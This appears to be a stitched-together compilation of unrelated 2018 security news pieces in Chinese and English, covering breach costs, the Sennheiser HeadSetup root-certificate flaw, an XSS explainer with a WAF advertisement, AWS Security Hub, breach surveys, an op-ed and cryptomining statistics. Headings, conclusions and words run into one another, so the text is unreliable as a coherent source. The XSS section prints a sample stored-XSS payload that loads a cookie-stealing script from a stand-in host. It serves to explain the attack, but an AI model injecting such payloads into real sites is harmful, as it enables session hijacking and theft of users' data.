确实，将安全作为事后才考虑的问题是企业决策过程中的一个重大缺陷，而且可能是致命的。数据泄露的平均成本为390万美元，这足以让无数公司破产。但成本还可能会更高。例如，在2013年的数据泄露事件后，雅虎同意支付5000万美元的和解金，并不得不另外支付了3750万美元的律师费和其它费用。但事件并未就此结束;最初以48.3亿美元出售给Verizon的雅虎数字服务以3.5亿美元折价出售，作为品牌价值下降的额外惩罚，并赔偿其它潜在的相关成本。数据泄露的真正代价是什么?远远超过当前可以看到的数字。

企业所有者不应将安全作为额外的可选成本，而应该将安全视为创收的核心能力;将安全集成到核心战略的增长潜力是巨大的。需要证据?只要看一下随着创新黑客威胁不断冲击而来的众多安全漏洞就知道了。没有迹象表明IoT僵尸网络、移动API和恶意软件等常见攻击会很快消失，容易受到系统漏洞攻击的企业也会面临风险。即使是Trojan恶意软件、漏洞利用等十年前的威胁，现在依然可以用于发起攻击，或者是以原始形式，或者经过修改，如恶意软件僵尸网络Mirai。

这就是为什么企业不能坐等“完美”的安全产品;推迟在安全上的投资只会增加企业被攻击的风险因素，并有可能让企业陷入一场不断追赶的游戏中，成本十分高昂。相反，从一开始就将新应用添加到安全业务框架中，企业就可以在不增加任何极端成本的情况下确保最佳的防护。

企业越早将安全集成到业务难题的核心部分，就能更好地防护并缓解威胁，并抓住新的创收机会。

不要让数据从缝隙中泄露出去。现在就开始保护客户体验。

【责任编辑：蓝雨泪 TEL：（010）68476606】

When users have been installing Sennheiser's HeadSetup software, little did they know that the software was also installing a root certificate into the Trusted Root CA Certificate store. To make matters worse, the software was also installing an encrypted version of the certificate's private key that was not as secure as the developers may have thought.

Similar to the Lenovo SuperFish fiasco , this certificateand its associated private key, was the same for everyone who installed the particular software. Due to this it could allow an attacker who was able to decrypt the private key to issue fraudulent certificates under other domain that they have no control over. This would allow them to perform man-in-the-middle attacks to sniff the traffic when a uservisits these sites.

While these certificate files are deleted when a user uninstalls the HeadSetup software, the trusted root certificate was not removed. This would allow an attacker who had the right private key to continue to perform attacks even when the software was no longer installed on the computer.

According to a vulnerability disclosure issued today by security consulting firm Secorvo these certificates werediscovered when doing a random check of a computer's Trusted Root Certificate CA store.

"Upon such a rare inspection of the Trusted Root CA store, we stumbled across two unexpected root certificates," stated Secorvo's report . "The issuer names in these two certificates indicated that they have a connection to the Sennheiser HeadSetup utility software installed on our systems in conjunction with the connected headsets of this manufacturer."

When HeadSetup is installed, it will place two certificates onto the computer. These certificates are used by the software to communicate with the headset using a TLS encrypted web socket.

The first certificate named SennComCCCert.pem is the root certificate and the SennComCCKey.pem is the private key for this certificate.

When the researchers analyzed the private key, they determined that it was encrypted with AES-128-CBC encryption and needed to find the proper password to decrypt it. As the HeadSetup program needed to decrypt the key as well, it means it must have been stored somewhere, which in this case was in a file calledWBCCListener.dll.

"In order to decrypt the file we needed to know the encryption algorithm and key that the manufacturer used for encryption," the researchers explained."Our first guess was that the vendor employed the common AES encryption algorithm with 128-bit key in CBC mode. In the HeadSetup installation directory, we found only one piece of executable code that contained the file name SennComCCKey.pem, a DLL file named WBCCListener.dll. We searched for “AES” in the strings contained in this DLL. The result is shown in Figure 4: there is indeed the algorithm identifier aes-128.cbc. We found the key that the vendor used in close proximity to that algorithm identifier, stored in clear in the code."

Once they decrypted the private key into a standard OpenSSL PEM they once again needed a passphrase to utilize it. This passphrase was located in a configuration file called WBCCServer.properties as shown below.

Now that they had access to the private key for the root certificate, they were able to generate a wild card certificate that signs traffic from google.com, sennheiser.com, and for fun, some of the headset maker's competitors -jbl.com, harmankardon.com, and bose.com.

As this certificate was created using the sameprivate key found on any computer that installed the same version of HeadSetup, those other computers would also be vulnerable to this certificate. It could then be used by an attacker to perform a man-in-the-middle attack to read and alter the secure traffic to these sites.

While there is definitely information to be stolen from these sites, attackers could just as easily create fraudulent certificates for banks in order to steal login credentials, credit card information, or other sensitive data.

Secorvohad responsibly disclosed this vulnerability to Sennheiserin advance and was issued the unique ID IDCVE-2018-17612. They were told by Sennheiserthat an updated version of the HeadSetupsoftware would be released by the end of November. When installed, the update would remove the trusted root certificates and make sure that no certificates are left behind when the software has been removed.

In the meantime, Sennheiserhas released a batch file and information that can be used to remove the certificates for those who want to be protected immediately. It is strongly suggested that all HeadSetup users download and execute this script to remove the vulnerable certificates.

Microsoft has also released the security advisory ADV180029, titled "Inadvertently Disclosed Digital Certificates Could Allow Spoofing", that explains that Microsoft has released an updated Certificate Trust List that removes trust for these certificates.

"Microsoft is publishing this advisory to notify customers of two inadvertently disclosed digital certificates that could be used to spoof content and to provide an update to the Certificate Trust List (CTL) to remove user-mode trust for the certificates," stated the advisory . "The disclosed root certificates were unrestricted and could be used to issue additional certificates for uses such as code signing and server authentication."

Cross-site scripting or XSS is one of the most dangerous and malicious yet most widespread and common attacks that look to gain access to and control of the users’ browser by using vulnerabilities in the application and thereby, gain access to their confidential and sensitive information. So, what exactly is cross-site scripting?

The attackers use vulnerabilities in these legitimate websites or web applications to inject malicious scripts/ codes that get executed when the unsuspecting victim (user) loads the website. The main difference between XSS attacks and other web-attack vectors is that this client-side code injection attack is not aimed at the web application, but at the users of vulnerable applications.

XSS attacks are generally broken down into two types: Stored/ Persistent XSS and Reflected XSS

Stored XSSis considered the most malicious and damaging type of XSS attacks. Here, the malicious payload (injected malicious scripts) is injected directly into the website/web application by exploiting its vulnerabilities, and these injected scripts are saved onto the web browser. So, every time the victim visits the website, the script gets activated. The session cookie of each visitor is sent to the attacker. This is why stored XSS is also known as persistent XSS.

Example: Upon snooping around different websites, a cyber-attacker finds vulnerabilities in the comment section of a specific website which allows users to embed HTML tags in it. So, the attacker embeds a malicious script in the comment section that reads something like Hi there! I am John and I loved this product. You can find my detailed review here. <script src=”http://hackersite.com/authstealer.js”> </script>. So, whenever any user visits the page, whether or not they go to the comments section, the malicious payload is triggered, and that user’s session cookies stolen by the attacker. Using this stolen cookie, the attacker can gain access to personal and confidential information of the user such as bank account details, credit card information, etc.

Reflected XSSis where the malicious payload is embedded into a link and activated only when the user clicks on the link. Here, the malicious payload is not stored but only displayed on the web page in the form of a URL or POST data.

As mentioned earlier, Stored XSS is the most damaging type of XSS attack. There are three major reasons for this:

As mentioned earlier, the main reason for XSS attacks is the presence of vulnerabilities and gaps in the web application or website that attackers can identify upon snooping around and use it as a medium to inject the malicious payload.

The gaps could exist because of permissions on the page for unencoded or unvalidated user inputs, and this mostly happens on sites that allow comments, feedback, user posts, etc. such as blogs, social media websites, video and content sharing websites, etc. The vulnerability could also permeate from the legacy or old, redundant VBScript, Active X, javascript, Flash Script, etc. that are used in the web application.

The impact and severity of successful XSS attacks vary widely. XSS attacks could result in session hijacking, stolen tokens and session cookies, CSRF (cross-site request forgery) attacks. These, in turn, lead to the user accounts being compromised and possibly breached into. The attacker then is able to use the stolen cookies to impersonate valid users. In cases where the valid user has administrative rights in the application, the attacker can use the privileges to even alter pages or execute codes on the server side.

Even though the XSS attacks are aimed at the users of web applications, there are heavy losses to the organization as well. How? There are obvious monetary losses. But what costs organizations dearly is the loss of customers, brand image and reputation.

Many browsers have inbuilt filters to prevent XSS attacks but one cannot rely only on the Client side capabilities to prevent attacks. As a website owner, it is imperative for the business to detect and fix them. Moreover, XSS Filters present in most web browsers do not filter all variants of XSS attacks. Continuous detection and scanning of your applications along with Web application Firewall (WAF) is one of the most effective and widely used solutions to secure web applications and its users from XSS attacks.

Choosing a comprehensive, intelligent and managed WAF like AppTrana will ensure round-the-clock, customized application security wherein web applications are monitored continuously for vulnerabilities, vulnerabilities are patched instantaneously until fixed by developers, and all bad traffic and malicious requests blocked. It leverages the power of human expertise by employing certified security professionals to conduct validated penetration testing with zero assured false positives, proof of concept and custom rules along with automation. AppTrana is endowed with Machine Learning and Global Intelligence threat platform which enable it to analyze attack behaviors, bot signatures, attack patterns, etc. and consolidate learnings to prevent application attacks including XSS attacks which is the one of most common attack vector used by hackers.

Venkatesh Sundar

Venky has played multiple roles within Indusface for the past 6 years. Prior to this, as the CTO @indusface, Venky built the product/service offering and technology team from scratch, and grew it from ideation to getting initial customers with a proven/validated business model poised for scale. Before joining Indusface, Venky had 10+ years of experience in security industry and had held various mgmt/leadership roles in Product Development, Professional Services and Sales @Entrust.

New security platform aggregates information from Amazon Web Services cloud accounts and third-party tools.

Amazon today officially rolled out a new platform for monitoring and prioritizing security issues for Amazon Web Services (AWS) accounts.

The new AWS Security Hub aggregates security alerts and compliance status of AWS accounts, including alerts from AWS services as well as other security tools from vendors Alert Logic, Armor, Barracuda, Check Point, CrowdStrike, CyberArk, Demisto, Dome9, F5 Networks, Fortinet, GuardiCore, IBM, McAfee, Palo Alto Networks, Qualys, Rapid7, Redlock, Sophos, Splunk, Sumo Logic, Symantec, Tenable, Trend Micro, Turbot, and Twistlock.

"You can also continuously monitor your environment using automated compliance checks based on the AWS best practices and industry standards your organization follows," the company said in its announcement of the new service.

Read more here .

Black Hat Europe returns to London Dec 3-6 2018 with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Dark Reading's Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.View Full Bio

A quarter of IT and security leaders expect a major data breach in the next year.

In its 2018 Strategic Security Survey (registration required), Dark Reading polled some 300 IT and security leaders and found that more organizations, not fewer, expect to face data breaches in the coming year compared with the previous year's survey. Moreover, the companies believe they're not fully ready to protect their data against intruders.

A large proportion of respondents expect that staffers with privileged access might be the source of a breach, but they're also wary of attackers from outside mounting one of many sophisticated new attacks. A growing attack surface, distributed denial-of-service extortion, targeted attacks, and ransomware are contributing to the unease that many organizations sense. But concerns about overstaffing and budgets seem to have abated compared to the level of worry expressed in 2017. Almost one in five (19%) respondents said they believe their companies are more vulnerable to data breaches than a year ago, a somewhat higher number than the 17% who felt that way last year. The proportion of respondents who believe their company's data-breach exposure hasn't changed has dropped. In Dark Reading's 2017 survey, 55% of respondents said their vulnerability to data breaches had remained stable over the past 12 months; this year, only 48% made that claim.

These results are worrying. The money poured into cybersecurity has skyrocketed in recent years, yet most companies feel that investment hasn't translated into the ironclad security they need.

Cybercrime and Targeted Attacks on the Rise

That said, just over half of the survey respondents said cybercriminals are the biggest threat to their security. Twenty-six percent of IT departments expect a serious breach next year stemming from a targeted attack, and 21% have already experienced one, up from 17% who reported having one in last year's survey. Another reason why targeted threats are a growing problem is simply that more people are aware of them. In the last few years, Western intelligence agencies have uncovered state-sponsored attackers ― especially from Russia, China, and North Korea ― who are launching laser-targeted assaults on companies with critical infrastructure.

The Cost of an Average Breach: $3.62 million

One might think that with so much money at stake, top executives would be spending more time learning how to make their companies more secure. Some of them are: 25% of the IT and security pros in the Dark Reading survey are satisfied that their corner-office teams are sufficiently security-savvy. But 39% say their top managers understand the business risks of data breaches but aren't sure how to quantify them. Both numbers are lower than the 29% and 45% reported last year. A quarter of respondents said their top managers don't really get how breaches might disrupt or even destroy the business, compared with 18% who reported a similar lack of comprehension last year. The numbers suggest that top managers are getting worse , not better, at grasping the potential consequences of data breaches.

App Security Emerges as Weakest Link in the Value Chain

Once again, malware and phishing were cited as the top two online problems. While 52% of respondents said they had suffered a malware-related breach, 48% said they'd been phishing targets. Ransomware was the third most-cited reason for a security breach in 2017, but the proportion of respondents (16%) that said they'd been victims of a ransomware attack was down substantially from previous surveys.

Conclusion

As destructive attacks flourish and counter-incident response becomes mainstream, organizations need to make a tactical paradigm shift from prevention to detection to suppression.

Genghis Khan was a mastermind. A terrifyingly brilliant military strategist who altered the course of world history. He used fear to paralyze his enemies. In Genghis Khan and the Making of the Modern World, J ack Weatherford writes:

In one apocryphal account circulated to create anxiety among the enemy, the Mongols supposedly promised to retreat from a besieged city if the defenders would give them a large number of cats and birds as booty. According to the story, the starving residents eagerly gathered the animals and gave them to the Mongols. After receiving all the birds and animals, the Mongols attached burning torches and banners to their tails and released them, whereupon the frightened animals raced back into the city and set it on fire.

History repeats itself. This year, the overt colonization of American cyberspace continued at breathtaking speed.China and Russia have escalated their cyberespionage campaigns and cybercriminals have armed themselves with weapons-grade capabilities, which has allowed them to conduct thousands of virtual home invasions unabated.

I fear that now is the time that "the year" winter comes. Strategically,geopolitical conflict has served as a harbinger for destructive cyberattacks. More rogue nations have developed A-teams that are leveraging sophisticated attack campaigns which are destructive in nature. Cyber intrusions have transformed from burglary to home invasionto arson. As shown in our Quarterly Incident Response Threat Report (QIRTR ), there has been a threefold increase in destructive attacks. A full 32% of all attacks witnessed by our Incident Response partners were destructive. Cyber spies and cybercriminals alike are setting our networks on fire.

After 21 years in cybersecurity, I am witnessing a dramatic evolution of cybercriminal capabilities, which is terrifying. The increasing attack surface coupled with the utilization of advanced tactics has allowed the adversary to become clairvoyant.The cybercriminal is already in our house. Given this phenomenon, we should mirror a model of physical security that is used to protect dignitaries and diplomats― the panic room.

A panic room , according to Wikipedia, is a "fortified room that is installed in a private residence or business to provide a safe shelter, or hiding place, for the inhabitants in the event of a home invasion."

A traditional panic rooms contain communications equipment like a phone or radio so that law enforcement authorities can be contacted. There is also a monitor for CCTV and alarms. Creating a panic room around your critical assets, users and subnets is imperative today. Ascorporations continue to deploy additional services and Internet of Things based devices, the surface area prone to attack is becoming too vast for existing static and sparsely deployed preventative controls. Consequently, organizations will need to make a major shift in security spending to provide improved situational awareness and visibility into the more advanced attacker movements after a breach. This spending must be strategic and accompany a tactical paradigm shift from prevention to detection to suppression.

Cyberspace has become punitive. As destructive attacks flourish and counter-incident response becomes mainstream, we must ensure that we create an inhospitable environment for cyber criminals. It is time to build your panic room.

Black Hat Europe returns to London Dec. 3-6, 2018, with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Tom Kellermann is the chief cybersecurity officer for Carbon Black Inc. Prior to joining Carbon Black, Tom was the CEO and founder of Strategic Cyber Ventures. On January 19, 2017 Tom was appointed the Wilson Center's Global Fellow for Cyber Policy in 2017. Tom previously ...View Full Bio

The cyber risk management model in its current form is broken. While cyber risk management is more important than ever for business executives, it’s more difficult for CISOs and cybersecurity teams to do thanks in part to an overwhelming attack surface, a huge number of vulnerabilities and sophisticated threats.

New ESG research, which is about to be published, shows that what has worked in the past is no longer an option. I’m an employee at ESG, and I’ve been knee-deep in the data for the past month. Here are a few of my initial impressions of the findings:

There is no such thing as a cyber risk management baseline.Risk management tasks such as vulnerability scanning, third-party risk audits, and penetration testing have always been conducted on a periodic and independent basis ―once a month, once a quarter, multiple times per year, etc. Often, these activities were guided by auditors, regulations, or even business partners rather than any cohesive and holistic risk management strategy.

Here’s the problem with this methodology ―everything is changing constantly, and every aspect of cyber risk management is interrelated. So, when one thing changes, it impacts everything else. How can you possibly benchmark cyber risk management at any point in time? You can’t. This means we must accept this realization and strive for continuous risk management measurement.

The research paints a clear picture: Cyber risk management is becoming more important for executives and more difficult for CISOs and cybersecurity teams.

Clearly, the current cyber risk management model is broken, and something must change. More on this soon.

The number of cryptomining attacks increased by more than 83 percent in the past year, with more than 5 million people attacked with the malware in the first three quarters of 2018.

That’s compared to 2.7 million people over the same period in 2017, according to stats from Kaspersky Lab.

The firm’s research also found that cryptomining attacks increased steadily during the first half of the year, peaking in March, when around 1.2 million users faced an attack.

Click to enlarge.

Kaspersky Lab researchers found that drivers behind this ramp aren’t necessarily the most obvious: The analysis revealed that neither cryptocurrency legislation nor the falling cost of power has a significant impact on the spread of malicious cryptominers. Rather, consumer interest in the installation and use of unlicensed software and pirated content was the major driver behind the crypto-bonanza.

“Our analysis of the economic background of malicious crypto-mining and the reasons for its widespread presence in certain regions revealed a clear correlation,” said Evgeny Lopatin, security expert at Kaspersky Lab, in the report. “The easier it is to distribute unlicensed software, the more incidents of malicious cryptominer activities were detected. In short, an activity not generally perceived as especially dangerous, the downloading and installation of dubious software, underpins what is arguably the biggest cyberthreat story of the year malicious cryptomining .”

The analysis also uncovered that the share of miners detected out of the overall number of threats seen grew as well, from 5 percent in 2017 to 8 percent in 2018; and, the total number of users who encountered mobile miners spiked significantly, increasing by more than five times from 1,986 users in 2017 to 10,242 in 2018.

Click to enlarge.

Hidden mining software was very popular among botnet owners too; telemetry on files downloaded by zombie networks showed a boom in cryptominers for the first quarter; they represented 4.6 percent of the total number of files downloaded by botnets. For comparison, in Q2 of 2017, this figure was 2.9 percent.

“Mining differs favorably for cybercriminals in that, if executed properly, it can be impossible for the owner of an infected machine to detect, and thus the chances of encountering the cyberpolice are far lower,” researchers said in the report. “And the reprofiling of existing server capacity completely hides its owner from the eyes of the law. Evidence suggests that the owners of many well-known botnets have switched their attack vector toward mining.”